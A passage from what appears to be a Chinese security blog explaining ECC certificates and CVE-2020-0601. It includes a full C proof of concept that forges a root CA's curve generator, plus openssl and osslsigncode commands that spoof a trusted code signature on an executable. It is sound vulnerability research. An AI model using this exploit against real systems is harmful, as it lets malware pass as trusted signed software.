    00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:fe:ff:ff:ff:ff:00:00:00:00:00:00:00:00:
    ff:ff:ff:fc
B:
    00:b3:31:2f:a7:e2:3e:e7:e4:98:8e:05:6b:e3:f8:
    2d:19:18:1d:9c:6e:fe:81:41:12:03:14:08:8f:50:
    13:87:5a:c6:56:39:8d:8a:2e:d1:9d:2a:85:c8:ed:
    d3:ec:2a:ef
Generator (uncompressed):
    04:aa:87:ca:22:be:8b:05:37:8e:b1:c7:1e:f3:20:
    ad:74:6e:1d:3b:62:8b:a7:9b:98:59:f7:41:e0:82:
    54:2a:38:55:02:f2:5d:bf:55:29:6c:3a:54:5e:38:
    72:76:0a:b7:36:17:de:4a:96:26:2c:6f:5d:9e:98:
    bf:92:92:dc:29:f8:f4:1d:bd:28:9a:14:7c:e9:da:
    31:13:b5:f0:b8:c0:0a:60:b1:ce:1d:7e:81:9d:7a:
    43:1d:7c:90:ea:0e:5f
Order:
    00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:c7:63:4d:81:f4:
    37:2d:df:58:1a:0d:b2:48:b0:a7:7a:ec:ec:19:6a:
    cc:c5:29:73
Cofactor:  1 (0x1)
Seed:
    a3:35:92:6a:a3:19:a2:7a:1d:00:89:6a:67:73:a4:
    82:7a:cd:ac:73
-----BEGIN EC PARAMETERS-----
MIIBVwIBATA8BgcqhkjOPQEBAjEA////////////////////////////////////
//////7/////AAAAAAAAAAD/////MHsEMP//////////////////////////////
///////////+/////wAAAAAAAAAA/////AQwszEvp+I+5+SYjgVr4/gtGRgdnG7+
gUESAxQIj1ATh1rGVjmNii7RnSqFyO3T7CrvAxUAozWSaqMZonodAIlqZ3OkgnrN
rHMEYQSqh8oivosFN46xxx7zIK10bh07Younm5hZ90HgglQqOFUC8l2/VSlsOlRe
OHJ2Crc2F95KliYsb12emL+Sktwp+PQdvSiaFHzp2jETtfC4wApgsc4dfoGdekMd
fJDqDl8CMQD////////////////////////////////HY02B9Dct31gaDbJIsKd6
7OwZaszFKXMCAQE=
-----END EC PARAMETERS-----
这个时候就能够使用指定的参数来生成指定的椭圆曲线方程。同理也能用这种方法直接生成密钥文件:
1
openssl ecparam -name secp384r1 -genkey -noout -out p384-key.pem -param_enc explicit
这样的密钥文件就能够被不支持当前算法的电脑进行使用了。
使用这种密钥可以自己创建根证书（中间证书），创建的步骤如下：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
$ openssl req -key p384-key.pem -new -out ca-normal.pem -x509 -set_serial 0x5c8b99c55a94c5d27156decd8980cc26
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:New Jersey
Locality Name (eg, city) []:Jersey City
Organization Name (eg, company) [Internet Widgits Pty Ltd]:The USERTRUST nEtwork
Organizational Unit Name (eg, section) []:USERTtrust ECC
Common Name (e.g. server FQDN or YOUR name) []:Certification Authority
Email Address []:test

$ openssl x509 -in ca-normal.pem -text -noout
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            5c:8b:99:c5:5a:94:c5:d2:71:56:de:cd:89:80:cc:26
        Signature Algorithm: ecdsa-with-SHA256
        Issuer: C = US, ST = New Jersey, L = Jersey City, O = "The USERTRUST nEtwork ", OU = USERTtrust ECC, CN = Certification Authority, emailAddress = test
        Validity
            Not Before: Jan 27 01:07:17 2020 GMT
            Not After : Feb 26 01:07:17 2020 GMT
        Subject: C = US, ST = New Jersey, L = Jersey City, O = "The USERTRUST nEtwork ", OU = USERTtrust ECC, CN = Certification Authority, emailAddress = test
        Subject Public Key Info:
            Public Key Algorithm: id-ecPublicKey
                Public-Key: (384 bit)
                pub:
                    04:48:54:7d:2c:f1:52:96:70:55:91:71:e3:0a:ee:
                    77:38:70:2e:04:70:d1:3a:e0:b5:61:43:12:6e:81:
                    2f:a4:6f:aa:04:dc:25:42:09:07:be:71:3a:47:19:
                    5a:c0:42:99:c8:14:1e:e7:ab:3c:9f:3d:4a:c1:ad:
                    57:57:1a:41:53:89:da:68:69:70:95:23:0b:04:b9:
                    6a:6d:19:b2:9d:db:11:f2:ac:1a:2e:42:a7:b6:68:
                    3a:ba:31:95:7b:75:26
                Field Type: prime-field
                Prime:
                    00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
                    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
                    ff:ff:fe:ff:ff:ff:ff:00:00:00:00:00:00:00:00:
                    ff:ff:ff:ff
                A:
                    00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
                    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
                    ff:ff:fe:ff:ff:ff:ff:00:00:00:00:00:00:00:00:
                    ff:ff:ff:fc
                B:
                    00:b3:31:2f:a7:e2:3e:e7:e4:98:8e:05:6b:e3:f8:
                    2d:19:18:1d:9c:6e:fe:81:41:12:03:14:08:8f:50:
                    13:87:5a:c6:56:39:8d:8a:2e:d1:9d:2a:85:c8:ed:
                    d3:ec:2a:ef
                Generator (uncompressed):
                    04:aa:87:ca:22:be:8b:05:37:8e:b1:c7:1e:f3:20:
                    ad:74:6e:1d:3b:62:8b:a7:9b:98:59:f7:41:e0:82:
                    54:2a:38:55:02:f2:5d:bf:55:29:6c:3a:54:5e:38:
                    72:76:0a:b7:36:17:de:4a:96:26:2c:6f:5d:9e:98:
                    bf:92:92:dc:29:f8:f4:1d:bd:28:9a:14:7c:e9:da:
                    31:13:b5:f0:b8:c0:0a:60:b1:ce:1d:7e:81:9d:7a:
                    43:1d:7c:90:ea:0e:5f
                Order:
                    00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
                    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:c7:63:4d:81:f4:
                    37:2d:df:58:1a:0d:b2:48:b0:a7:7a:ec:ec:19:6a:
                    cc:c5:29:73
                Cofactor:  1 (0x1)
                Seed:
                    a3:35:92:6a:a3:19:a2:7a:1d:00:89:6a:67:73:a4:
                    82:7a:cd:ac:73
        X509v3 extensions:
            X509v3 Subject Key Identifier:
                12:55:F0:4C:B9:95:CE:66:4C:24:75:41:57:2C:49:B0:39:93:68:80
            X509v3 Authority Key Identifier:
                keyid:12:55:F0:4C:B9:95:CE:66:4C:24:75:41:57:2C:49:B0:39:93:68:80

            X509v3 Basic Constraints: critical
                CA:TRUE
    Signature Algorithm: ecdsa-with-SHA256
         30:66:02:31:00:c8:a3:c1:ba:d8:7a:16:db:f9:c7:36:85:f8:
         0c:90:3b:e4:e5:b0:13:76:1d:4a:7d:ed:b1:3b:bf:20:3b:2c:
         8e:e0:96:cd:6b:4f:78:61:b3:ff:77:57:8a:64:13:dd:5d:02:
         31:00:a0:32:86:17:88:bd:38:22:00:e0:2f:ae:e0:d2:86:e6:
         6d:6f:d4:0b:2a:77:48:de:d2:a9:05:a0:d4:df:62:84:0b:e2:
         35:fe:d7:60:15:f1:81:f5:7e:23:0a:07:cc:b2
这样就相当于使用密钥对p384-key.pem文件，创建了一个对应的根证书（CA）文件。这个CA文件具有给别的CSR签名的权力。
那要如何给别的证书签名呢？首先创建一个普通的证书
1
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem
这样会创建一个公钥私钥对。然后我们要发起一个证书签名请求:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ openssl req -key prime256v1-privkey.pem -new -out prime256v1.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:Test
string is too long, it needs to be no more than 2 bytes long
Country Name (2 letter code) [AU]:AT
State or Province Name (full name) [Some-State]:TestState
Locality Name (eg, city) []:TestCity
Organization Name (eg, company) [Internet Widgits Pty Ltd]:TestOrg
Organizational Unit Name (eg, section) []:TestUT
Common Name (e.g. server FQDN or YOUR name) []:TestCOMM
Email Address []:Test

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
签名请求里面会包含当前证书公钥私钥对，以及需要被签名的基本信息，例如公司，网站地址，email等基本信息。
这个证书请求表明我们发起了一个请求，要对这个证书进行签名。之后我们使用根证书来对这个请求进行签名:
1
openssl x509 -req -in prime256v1.csr -CA ca-normal.pem -CAkey p384-key.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req
openssl 将CSR中证书相关的内容提取出来，然后通过指定CA证书，以及生成CA证书时使用的公钥私钥对，使用私钥对证书进行了签名。这个签名完成得到的client-cert.pem就是一个受到CA验证得到的签名文件。
如果想要给软件签名，首先要打包成pkcs#12的格式
1
openssl pkcs12 -export -in client-cert.crt -inkey prime256v1-privkey.pem  -certfile ca-normal.pem -name "Code Signing" -out cert.p12
然后使用SDK中提供的工具进行签名:
1
signtool.exe sign /f cert.p12 test.exe
签名完成之后，还能够对文件本身的签名进行验证:
1
signtool.exe verify test.exe
我们来查看一下当前的证书内容:

可以看到颁发给这边写的内容为TestCOMM，也就是我们发起证书请求的对象。然后查看当前证书详细信息中可以看到如下信息:

可以看到这边写了很多基本的加密信息，其中的颁发者写的正是我们CA自己的基本信息。而使用者为发起证书请求的人。检查其证书路径（也就是证书链）能够看到如下的逻辑:

这里会发现，我们只能看到我们自己创建的证书内容，但是没有我们CA的内容。这是为啥呢？主要是因为我们的CA是我们自己创建的。
总的来说，证书向CA请求签名逻辑如下:
证书与通信
由于一般的证书颁发都是有一个可信的根证书(Root CA)。所以一般颁发出来的证书实际上都是包含一个证书路径（证书链）。我们来看一个例子:
这个是网站cnblogs.com的证书，可以看到有一个证书颁发链。为了能够帮助计算机快速的对这类使用了TLS/SSL通信协议的网站进行认证，这个根证书会在本地存有一份。我们首先检查这个证书链上根证书的内容:
然后我们打开计算机上的证书管理器(ctrl+R -> certmsg.msc)可以看到本地也安装了名字一样的证书:
可以看到证书的名字也一样。通过这种验证方式，就能够让本地快速确定通信对方证书是否可信，从而缩短验证的逻辑。
Root CA 与 C/S 架构下的加密通信过程
Root CA证书中，包含有一个 CA_PubKey 以及一个公开的k
如果这个Root CA证书是自己生成的的话（也就是可以用于签名的CA），那么这个证书中有一个 CA_PrivKey。（注意CA是给证书签名的机构，这个时候证书本身也有公钥和私钥，在CA签发证书的时候这对公私钥不参与运算）
完成签名后的证书中包含需要使用当前Root CA签名验证的时候，使用私钥对原先证书中内容进行的加密。其中证书提交的信息有:
组织信息
个人信息
证书公钥（也就是私钥其实是不需要提供的）
CA颁发的证书中包含如下内容:
原先证书中的基本信息
原先证书的公钥
上述所有明文信息的hash值，以防止篡改
CA对上述明文信息hash值使用私钥加密后的信息（签名）
当用户收到这个证书的时候，首先用证书中提到的hash算法对明文信息进行运算，然后会使用浏览器/计算机中安装了的CA的公钥对签名进行解密，如果解密出来得到的内容和用户计算得到的hash值一样的话，则可以确定当前证书是合法的，于是可以确认这个证书中记录的公钥合法。从https通信的角度来说，这个时候就能够获得一个用于三次握手的时候，双方用来约定密钥的公钥。之后客户端就能够对自己产生的随机数使用密钥加密，完成和服务器的通信密钥商定。（具体是一个https约定的过程，之后有空可以补上这个过程）
ECC与CA的关系
在进行步骤CA对证书请求进行私钥签名这一步的时候，如果我们选择的加密方式为ECC 椭圆曲线加密的话，实际上会进行一个如下的数学运算：
设椭圆曲线E为有限域 $Z_p$ 上的椭圆曲线，然后选取的p>3为大素数。a为椭圆曲线上的一点，如果ord(a)足够大，则在由a生成的循环群中离散对数问题是难解的，p，E和a都公开（在证书中可以被openssl查到）
随机选取整数d，满足1<=d<=ord(a)- 1，计算 b=da,b是公钥，d是私钥
设明文 $x=(x_1, x_2) \in \text{明文空间}$  随机选取整数 k 满足 1<=k<= ord(a)，此时密文为
 $y = (y_0,y_1,y_2)$ 
其中满足
 $y0 = ka,\\(c_1, c_2) = kd \text{（注意这个地方使用私钥加密）}\\y_1 = c_1x_1modp\\y_2 = c_2x_2modp$ 这里注意到，这个运算中，其实关键在于b=d*a这个地方的运算。因为实际上a是公开的（记录在证书中的生成元generator），而公钥b我们也是已知的，相当于正是因为将d隐藏起来，才让这个问题变得难解了。这要注意到，这个d乘以a的运算并不是通常意义上的乘法，而是定义在椭圆曲线算法上的一种特殊乘法运算，具体就是前文提到的椭圆曲线上形成的循环群中的算法。
而这些算法的细节，实际上会记录在自建的证书中，包括Root CA。如果我们创建证书的时候，使用了参数-param_enc explicit的场合，我们就能够自定义椭圆曲线中，所有的参数，包括用于生成公钥的生成元generator的值
漏洞成因
Windows上的crypt32.dll中的APICertVerifyCertificateChainPolicy和CertDllVerifyMicrosoftRootCertificateChainPolicy会检查当前证书中的证书链。然而在检查的过程中，Windows只验证了指定证书中的Root CA公钥是否和电脑上缓存的Root CA证书中的公钥是否相等，并未验证生成元是否被篡改了。如果公钥相等的话就简单的认为，当前颁发证书的CA就是指定的CA。
这样我们就有一个这样的逻辑去利用漏洞：
首先找一个使用了ECC的CA
读取其中的G，将其替换成一个方便计算的值，这里我们假设替换成 $2^{-1}$ ，也就是2在这个椭圆曲线定义的阶(order)上的逆元。由于2非常小，所以 $2^{-1}$ 非常方便计算。
计算2的逆元乘以公钥PubKey，得到一个伪造的G': $G'=Pubkey*2^{-1}$ 
将这个G'写入参数证书中，并且将2作为私钥写入到一个我们需要被验证的签名里面，这样的话就能够满足PubKey不变，同时满足 $PubKey=G'*PrivKey=PubKey*2^{-1}*2=PubKey$ 。所以此时被公钥加密过的内容能够被私钥解密，同时保证证书的自校验能够通过。
漏洞利用思路
由于Windows对证书的验证过程中，指挥检测公钥的基本信息（和已安装的证书内容进行比较），所以我们可以找一个用了ECC加密的根证书。然后将这个根证书中的G进行修改。这样我们就能自己伪装成CA，使用这个ECC证书对我们自己的CSR进行签名。这样当我们就能获得一个来自ECC官方签名后的证书。
复现过程
首先这里放出参考别人写的Poc:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
#include
#include
#include
#include
#include
#include
#include 
#pragma comment(lib, "libssl.lib")
#pragma comment(lib, "libcrypto.lib")

int main(int argc, char*argv[] )
{
puts("[+] CVE-2020-0601 Reproduce [+]");
puts("[+] ==== Load Cert file === [+]");
char filename[260] = { 0 };
char new_filename[270] = { 0 };
if (argc < 2) 
{
strcpy(filename, "USERTrustECCCertificationAuthority.crt");
}
else if (argc == 2) {
strcpy(filename, argv[1]);
}
strcpy(new_filename, filename);
strcat(new_filename, "_modify");
// read cert file content with openssl api
BIO *bCert = NULL, *bKey = NULL, *bOut = NULL;
X509 *xCert = NULL;
EVP_PKEY *publicKey = NULL;
EC_KEY *ecPublicKey = NULL;
EC_GROUP *ecGroup = NULL;

int bStatus = 0;
do 
{
// new a BIO memory
bCert = BIO_new(BIO_s_file());
bOut = BIO_new_fp(stdout, BIO_NOCLOSE);
if (bCert == NULL){
puts("[ERROR] NEW BIO ERROR");
break;
}
if (!BIO_read_filename(bCert, filename)){
puts("[ERROR] READ FILE ERROR");
break;
}
// parse cert file, here will parse like openssl x509 -in certfile -text
xCert = PEM_read_bio_X509(bCert, NULL, NULL, NULL);
if (xCert == NULL){
puts("[ERROR] Read the x509 cert failed");
break;
}
X509_print_ex(bOut, xCert, 0, 
X509_FLAG_NO_VERSION 
| X509_FLAG_NO_SIGNAME 
| X509_FLAG_NO_SIGDUMP 
| X509_FLAG_NO_EXTENSIONS 
| X509_FLAG_NO_AUX 
| X509_FLAG_NO_ATTRIBUTES 
| X509_FLAG_NO_IDS);
publicKey = X509_get0_pubkey(xCert);
if (publicKey == NULL) {
puts("[ERROR] Get public key error");
break;
}
if (EVP_PKEY_id(publicKey) != EVP_PKEY_EC) {
puts("[ERROR] This is not EC CERT");
break;
}
publicKey = X509_get0_pubkey(xCert);
if (publicKey == NULL) {
puts("[ERROR] Get the ec public key error");
break;
}
if (EVP_PKEY_id(publicKey) != EVP_PKEY_EC) {
puts("[ERROR] This public key is not ec key!");
break;
}
ecPublicKey = EVP_PKEY_get0_EC_KEY(publicKey);
if (ecPublicKey == NULL) {
puts("[ERROR] get EC Public key from publick key error!");
break;
}
// Try to dup a new EC Group, with self-defined public/private key and generator
EC_GROUP* tmp_ecGroup = NULL;
tmp_ecGroup = EC_GROUP_dup(EC_KEY_get0_group(ecPublicKey));
if (tmp_ecGroup == NULL) {
puts("[ERROR] Dup ec group error");
break;
}
// Set this group to explicit, that's mean we can modified it's ec parameter
// public/private key and generator
// this work like openssl ecparam -param_enc explicit
EC_GROUP_set_asn1_flag(tmp_ecGroup, OPENSSL_EC_EXPLICIT_CURVE);
// here we set new ec group generator to Public Key
if (!EC_GROUP_set_generator(
tmp_ecGroup,
EC_KEY_get0_public_key(ecPublicKey),
EC_GROUP_get0_order(EC_KEY_get0_group(ecPublicKey)),
EC_GROUP_get0_cofactor(EC_KEY_get0_group(ecPublicKey))
)) {
puts("[ERROR] Set new EC group generator error");
ERR_print_errors(bOut);
break;
}
// here we copy a new EC Group, with same Pub/Priv key and generator
ecGroup = tmp_ecGroup;

// update the ec public key to new ec group
if (!EC_KEY_set_group(ecPublicKey, ecGroup) ){
puts("[ERROR] Set new EC group error");
break;
}
// here we will edit the private key to one
if (!EC_KEY_set_private_key(ecPublicKey, BN_value_one())) {
puts("[ERRO] Set private key failed");
break;
}
// Now the Pub/Priv key satisfy the pub=priv*generator

BIO_printf(bOut, "Private key set to 1\n");
EC_KEY_print(bOut, ecPublicKey, 0);
// now perpare to write to new key file
bKey = BIO_new(BIO_s_file());
if (!bKey) {
puts("[ERROR] Create new file failed");
break;
}
if (!BIO_write_filename(bKey, new_filename)) {
puts("[ERRO] redirect bKey to new file failed");
break;
}
if (!PEM_write_bio_ECPrivateKey(bKey, ecPublicKey, NULL, NULL, 0, NULL, NULL)) {
puts("[ERRO] Write to new file as PEM format failed");
break;
}
} while (0);
if (bKey)
BIO_free(bKey);
if (bCert)
BIO_free(bCert);
if (bOut)
BIO_free(bOut);
return 0;
}
因为搜了很久，找不到 python 操作证书的细节，所以只能用C来写了。其实整个PoC做的事情很简单：
读取证书USERTrustECCCertificationAuthority.crt中的内容
将证书中的EC（椭圆曲线加密）中的Group（群）读取出来，将其拷贝一份
将新拷贝中的公钥生成元改成公钥的值，并且将私钥改成1，此时符合等式 $PubKey=G*PrivKey$ 
将新的群写入到自定义的公钥私钥对中。这个新的公钥私钥对就能够用来生成伪造的CA
因为上文提过，证书只要加上-param_enc explicit参数，就允许自定义证书中的算法参数。这个漏洞正是利用了这个特点，在不改变公钥的前提下，将私钥和生成元自定义。
然后使用如下的指令生成自己的CA:
1
.\openssl.exe req -key USERTrustECCCertificationAuthority.crt_modify -new -out FakeCA.crt -x509 -set_serial 0x5c8b99c55a94c5d27156decd8980cc26
之后就能够用这个CA给CSR签名了。我们随便生成一个证书并且发起请求:
1
2
.\openssl.exe ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey-test.pem
.\openssl.exe req -key .\prime256v1-privkey-test.pem -new -out prime256v1_req.csr
然后用CA对这个请求进行授权，得到一个CA授权的证书：
1
\openssl.exe x509 -req -in .\prime256v1_req.csr -CA .\FakeCA.crt -CAkey .\USERTrustECCCertificationAuthority.crt_modify -CAcreateserial -out fake-test-cert.crt -days 500 -extensions v3-req
这样就做出了一个可以用于签名的证书。不过首先要将这些证书打包:
1
.\openssl.exe pkcs12 -export -in .\fake-test-cert.crt -inkey .\prime256v1-privkey-test.pem -certfile .\FakeCA.crt -name "Fake Sign" -out fakep12.p12
这边证书打包成了PKCS#12的格式，然后我们使用签名工具osslsigncode进行签名（微软的signcode.exe似乎没办法对PKCS#12格式的文件进行签名）
1
osslsigncode sign -pkcs12 fakep12.p12 -n "Singed by l1nk" -in test.exe -out test-l1nk.exe
最后我们检查一下被签名的文件:
可以看到，我们成功伪造了一个签名。
一点思考
很多的文章提到，微软修复了APICertVerifyCertificateChainPolicy调用的CertDllVerifyMicrosoftRootCertificateChainPolicy这个API的bug，从而修复了这个问题。但是我发现，无论是微软的signcode.exe，还是我自己写API去check这个签名的时候，又或者直接点开证书的时候，都会发现实际上程序能够发现漏洞，使用API check的时候会爆出错误:CERT_E_UNTRUSTEDROOT，也就是当前根证书不可信，与其他两种方法去verify证书的时候爆出的错误类型一致。
这是不是就说明实际上的问题这个API出现的问题实际上不是这个漏洞真正的成因呢？这个就当作最近的TODOList了
散记
这里记录一些研究过程中参考过的相关资料（内容不太全）
ECC ASN.1
因为OpenSSL定义的证书中的细节是用 ASN.1 的协议来定义的，所以这边需要介绍一下这个协议的细节:
1
2
3
4
SubjectPublicKeyInfo  ::=  SEQUENCE  {
algorithm         AlgorithmIdentifier,
subjectPublicKey  BIT STRING
}
这个是X.509证书协议中定义的ASN.1形式的结构体.这个结构中描述了两个关键内容:
algorithm中定义了ECC算法本身以及ECC公钥中使用的参数
subjectPublicKey定义了ECC的公钥
然后这个AlgorithmIdentifier定义如下:
1
2
3
4
AlgorithmIdentifier  ::=  SEQUENCE  {
algorithm   OBJECT IDENTIFIER,
parameters  ANY DEFINED BY algorithm OPTIONAL
}
这个algorithm定义了算法本身，算法分为以下几种:
id-ecPublicKey:表明当前的算法可以与主要公钥一起使用，没有限制
id-ecDH:表明当前算法的主要公钥只能在椭圆曲线Diffie-Hellman算法一起使用
id-ecMQV:表明当前算法的主要公钥能够在椭圆曲线Menezes-Qu-Vanstone算法下使用
通常我们使用的是第一种。这里我们详细介绍一下第一种算法的细节。如果使用第一种算法的话，此时的OBJECT IDENTIFIER定义如下:
1
2
id-ecPublicKey OBJECT IDENTIFIER ::= {
       iso(1) member-body(2) us(840) ansi-X9-62(10045) keyType(2) 1 }
之后必须包含如下的参数:
1
2
3
4
5
ECParameters ::= CHOICE {
   namedCurve         OBJECT IDENTIFIER
   -- implicitCurve   NULL
   -- specifiedCurve  SpecifiedECDomain
}
namedCurve指定了当前椭圆曲线算法中具体使用的椭圆曲线算法类型。包含如下的类型:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
secp192r1 OBJECT IDENTIFIER ::= {
  iso(1) member-body(2) us(840) ansi-X9-62(10045) curves(3)
  prime(1) 1 }

sect163k1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 1 }

sect163r2 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 15 }

secp224r1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 33 }

sect233k1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 26 }
  sect233r1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 27 }

secp256r1 OBJECT IDENTIFIER ::= {
  iso(1) member-body(2) us(840) ansi-X9-62(10045) curves(3)
  prime(1) 7 }

sect283k1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 16 }

sect283r1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 17 }

secp384r1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 34 }

sect409k1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 36 }

sect409r1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 37 }

secp521r1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 35 }

sect571k1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 38 }

sect571r1 OBJECT IDENTIFIER ::= {
  iso(1) identified-organization(3) certicom(132) curve(0) 39 }
subjectPublicKey
这个位置定义了ECC使用的公钥。ECC 定义公钥语法如下
1
ECPoint ::= OCTETSTRING
椭圆曲线加密算法中对ECPoint的实现是未加密的形式。
这个ECPoint虽然定义为OCTETSTRING，但是实际上会映射到subectPublicKey这个类型上。当前定义的第一个字节将会表明当前对象是否为压缩。若当前的密钥是未压缩的，则此时的开头为0x4，如果是压缩过的，则可能是0x2/0x3
未压缩的ECPoint一般是65字节的。去掉开头的0x4，则之后64字节平分为两部分，前面32字节为Point.x后面32字节为Point.y。
参考链接
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601
https://msrc-blog.microsoft.com/2020/01/14/january-2020-security-updates-cve-2020-0601/
https://github.com/kudelskisecurity/chainoffools
https://www.itu.int/ITU-T/formal-language/itu-t/x/x509/2005/AuthenticationFramework.html

Attribute	Description
SE_GROUP_ENABLED	启用了这个属性的SID能够被进行访问检查。当系统尝试进行访问检查的时候，当检查当前的SID对应的ACE中状态为`allowed\deny`的时候，能够被检查到。与此同时，未设置这个属性的（除了`SE_GROUP_USE_FOR_DENY_ONLY`）的SID将会被忽略检查
SE_GROUP_USE_FOR_DENY_ONLY	启用这个属性的SID被称为`deny-only`的SID，当系统进行访问检查的时候，只会检查对当前SID中deny的权限，而忽略所有allow的权限，也就是只关注这个SID被显示的拒绝了什么权限，而不关注其被允许的权限。一旦这个属性被设置的话，`SE_GROUP_ENABLED`将无法被设置，并且SID不能被enable。

l1nk3dHouse

RustPwn_CVE-2024-27284

CVE-2024-27284

漏洞背景

Patch分析

Rust基本特性补充

基础篇

所有权与引用

生命周期

泛型、Trait和生命周期

漏洞相关Rust基础知识

虚幻数据PhantomData

迭代器 iter

漏洞分析

Patch分析

核心漏洞点

修复策略

其他点分析

参考资料

DiceCTF_Scrambled_up

Scrambled-up

初探程序

程序初始化 read_inst

解析Block parser_inst

执行部分 exec_inst

exec_type 4 – 新的关键函数

程序架构介绍

题目分析

题目初步分析

阶段一：数据流dump

阶段二：flag有效性检查一

阶段三：迷宫绕路

总结

Terrapin-Attack-学习2

Terrapin Attack

通信完整性定义

如何算是对SSH发起攻击

SSH 历史问题

SSH前置知识补充

CVE-2008-5161 针对M&E的攻击

SSH与出错审计

SSH 中间人攻击

前14bit猜测

所有bit恢复

攻击场景

侧信道攻击

Terrapin Attack

SSH握手阶段

KEXINIT

KEXDHINIT

交换用hash：仅对部分数据校验

序列码

Terrapin Attack 攻击细节

核心漏洞成因

修改序列数

BBP上进行前缀截断攻击

适用范围

CBC-EtM 与出错处理

具体实例： ChaCha20-Poly1305

具体实例： CBC-EtM.

具体攻击 AsyncSSH

恶意使用EXTINFO

劫持SSH会话，要求有一个能够SSH的用户信息

总结

Terrapin Attack 学习

SSH 前置知识学习

密码学前置知识

加密模式

Padding

ECB（Electronic codebook）

CBC（Chain Block Cipher）

PCBC（Propagating Chain Block Cipher）

Cipher feedback (CFB)

Output feedback (OFB)

CTR（Counter） mode

MAC 与 AEAD

AE 加密流程

常见的AEAD加密模式

Encrypt-then-MAC (EtM) 加密后添加MAC

Encrypt-and-MAC (E&M) 同时获得密文与MAC

虚幻数据`PhantomData`

恶意使用`EXTINFO`

进入`OSF_SCALL::GetCoalescedBuffer`前的最后准备

关键点 `OSF_SCALL::GetCoalescedBuffer` 漏洞触发